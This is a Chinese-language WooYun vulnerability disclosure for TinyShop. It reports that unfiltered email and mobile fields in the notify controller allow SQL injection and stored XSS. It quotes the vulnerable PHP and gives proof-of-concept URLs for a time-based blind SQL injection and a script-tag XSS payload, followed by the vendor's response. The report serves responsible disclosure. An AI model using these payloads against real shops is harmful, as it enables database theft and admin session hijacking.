TinyShop同一处盲注和存储型xss | wooyun-2014-073720| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073720

漏洞标题：TinyShop同一处盲注和存储型xss

漏洞作者： zxx

提交时间：2014-08-26 11:59

修复时间：2014-11-24 12:00

公开时间：2014-11-24 12:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-08-26：细节已通知厂商并且等待厂商处理中
2014-08-28：厂商已经确认，细节仅向厂商公开
2014-08-31：细节向第三方安全合作伙伴开放
2014-10-22：细节向核心白帽子及相关领域专家公开
2014-11-01：细节向普通白帽子公开
2014-11-11：细节向实习白帽子公开
2014-11-24：细节向公众公开

简要描述：

参数未进行过滤，导致同一位置出现sql注入和可打后台存储xss。

详细说明：

先看看tinyshop如何处理传递的参数：
/framework/lib/util/request_class.php中

public static function get()
    {
        $num = func_num_args();
        $args = func_get_args();
        if($num==1)
        {
            if(isset($_GET[$args[0]])){
                if(is_array($_GET[$args[0]]))return $_GET[$args[0]];
                else return trim($_GET[$args[0]]);
            }
            return null;
        }
        else if($num>=2)
        {
            if($args[1]!==null)$_GET[$args[0]] = $args[1];
            else if(isset($_GET[$args[0]])) unset($_GET[$args[0]]);
        }
        else
        {
            return $_GET;
        }
    }
    //对应处理$_POST
    public static function post()
    {
        $num = func_num_args();
        $args = func_get_args();
        if($num==1)
        {
            if(isset( $_POST[$args[0]])){
                if(is_array( $_POST[$args[0]]))return  $_POST[$args[0]];
                else return trim( $_POST[$args[0]]);
            }
            return null;
        }
        else if($num>=2)
        {
            if($args[1]!==null)	$_POST[$args[0]] = $args[1];
            else if(isset($_POST[$args[0]])) unset($_POST[$args[0]]);
        }
        else
        {
            return $_POST;
        }
    }
    //同时处理$_GET $_POST
    public static function args()
    {
        $num = func_num_args();
        $args = func_get_args();
        if($num==1)
        {
            if(isset($_POST[$args[0]])){
                if(is_array($_POST[$args[0]]))return $_POST[$args[0]];
                else return trim($_POST[$args[0]]);
            }
            else{
                if(isset($_GET[$args[0]])){
                    if(is_array($_GET[$args[0]]))return $_GET[$args[0]];
                    else return trim($_GET[$args[0]]);
                }
            }
            return null;
        }
        else if($num>=2)
        {
            if($args[1]!==null)
            {
                $_POST[$args[0]] = $args[1];
                $_GET[$args[0]] = $args[1];
            }
            else
            {
                if(isset($_GET[$args[0]])) unset($_GET[$args[0]]);
                if(isset($_POST[$args[0]])) unset($_POST[$args[0]]);
            }
        }
        else
        {
            return $_POST+$_GET;
        }
    }

从上面可以看出，只是将POST和GET的方法封装到Req类里，并没有过滤。
弱点出现在/protected/controllers/index.php中

public function notify()
    {
        $goods_id = Filter::int(Req::args('goods_id'));
        $email = Req::args('email');//
        $mobile = Req::args('mobile');//email和mobile都没过滤
        $model =  new Model('notify');
        $register_time = Date('Y-m-d H:i:s');
        $info = array('status'=>'fail','msg'=>'您还没有登录，无法订阅到货通知。');
        if(isset($this->user['id'])){
            $time = date('Y-m-d H:i:s' , strtotime('-3 day'));
            $obj = $model->where('user_id = '.$this->user['id'].' and goods_id='.$goods_id.' and register_time >'."'$time'")->find();
            if($obj){
                $info = array('status'=>'warning','msg'=>'您已订阅过了该商品的到货通知。');
            }else{
                $data = array('user_id'=>$this->user['id'],'goods_id'=>$goods_id,'register_time'=>$register_time,'email'=>$email,'mobile'=>$mobile);
                $last_id = $model->data($data)->insert();//未过滤的数据插入数据库
                if($last_id>0)$info = array('status'=>'success','msg'=>'订阅成功。');
                else $info = array('status'=>'fail','msg'=>'订阅失败。');
            }
        }
        echo JSON::encode($info);
    }

漏洞证明：

注入：
因为没有回显，也不能报错，就得基于时间盲注了：
http://localhost/index.php?con=index&act=notify&goods_id=1&email=111',(if(substring(user(),1,1)=char(114),sleep(5),798))) %23&mobile=1
如果user的第一位是r，那么就延迟5秒。

xss:
http://localhost/index.php?con=index&act=notify&goods_id=2&email=<script>alert(\'zxx\');</script>&mobile=111

管理员后台查看到货通知处：

修复方案：

过滤一下

版权声明：转载请注明来源 zxx@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：2

确认时间：2014-08-28 16:08

厂商回复：

非常感谢您为TinyShop信息安全做的贡献，此问题已经360库带反馈，不过仍然感谢你的支持。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073720

漏洞标题：TinyShop同一处盲注和存储型xss

相关厂商：tinyrise.com

漏洞作者： zxx

提交时间：2014-08-26 11:59

修复时间：2014-11-24 12:00

公开时间：2014-11-24 12:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zxx@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-073720

漏洞标题：TinyShop同一处盲注和存储型xss

相关厂商：tinyrise.com

漏洞作者： zxx

提交时间：2014-08-26 11:59

修复时间：2014-11-24 12:00

公开时间：2014-11-24 12:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-073720"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zxx@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：